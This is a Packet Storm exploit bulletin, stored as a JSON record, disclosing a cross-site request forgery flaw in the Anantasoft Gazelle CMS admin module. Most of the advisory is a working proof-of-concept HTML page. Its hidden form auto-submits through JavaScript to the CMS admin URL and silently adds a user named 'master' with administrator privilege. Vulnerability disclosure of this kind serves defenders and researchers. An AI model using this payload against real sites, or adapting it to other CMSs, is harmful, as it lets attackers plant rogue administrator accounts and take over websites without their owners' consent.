{"id": "PACKETSTORM:87088", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Anantasoft Gazelle CMS Cross Site Request Forgery", "description": "", "published": "2010-03-10T00:00:00", "modified": "2010-03-10T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/87088/Anantasoft-Gazelle-CMS-Cross-Site-Request-Forgery.html", "reporter": "Pratul Agrawal", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:19", "viewCount": 1, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:20:19", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:19", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/87088/anantasoft-xsrf.txt", "sourceData": "` ======================================================================= \n \nAnantasoft Gazelle CMS CSRF Vulnerability \n \n======================================================================= \n \nby \n \nPratul Agrawal \n \n \n \n# Vulnerability found in- Admin module \n \n# email Pratulag@yahoo.com \n \n# company aksitservices \n \n# Credit by Pratul Agrawal \n \n# Software Anantasoft_Gazelle_CMS \n \n# Category CMS / Portals \n \n# Site p4ge http://www.opensourcecms.com/demo/2/193/Anantasoft_Gazelle_CMS \n \n# Plateform php \n \n \n \n# Proof of concept # \n \nTargeted URL: http://server/demo/2/193/Anantasoft_Gazelle_CMS \n \n \nScript to Add the Admin user through Cross Site request forgery \n \n. ................................................................................................................ \n \n<html> \n \n<body> \n \n<form name=\"XYZ\" action=\"http://demo.opensourcecms.com/gazelle/admin/index.php?Users/Add%20User\" method=\"post\"> \n \n<input type=hidden name=\"name\" value=\"master\"> \n \n<input type=hidden name=\"pass\" value=\"master\"> \n \n<input type=hidden name=\"controle\" value=\"master\"> \n \n<input type=hidden name=\"email\" value=\"master%40yahoo.com\"> \n \n<input type=hidden name=\"active\" value=\"on\"> \n \n<input type=hidden name=\"showemail\" value=\"on\"> \n \n<input type=hidden name=\"admin%5B%5D\" value=\"2\"> \n \n<input type=hidden name=\"save\" value=\"Add\"> \n \n<input type=hidden name=\"table\" value=\"users\"> \n \n<input type=hidden name=\"joindate\" value=\"2010-03-10+04%3A04%3A36\"> \n</form> \n \n<script> \n \ndocument.XYZ.submit(); \n \n</script> \n \n</body> \n \n</html> \n \n. .................................................................................................................. \n \n \n \nAfter execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege. \n \n \n#If you have any questions, comments, or concerns, feel free to contact me. \n \n`\n"}

{}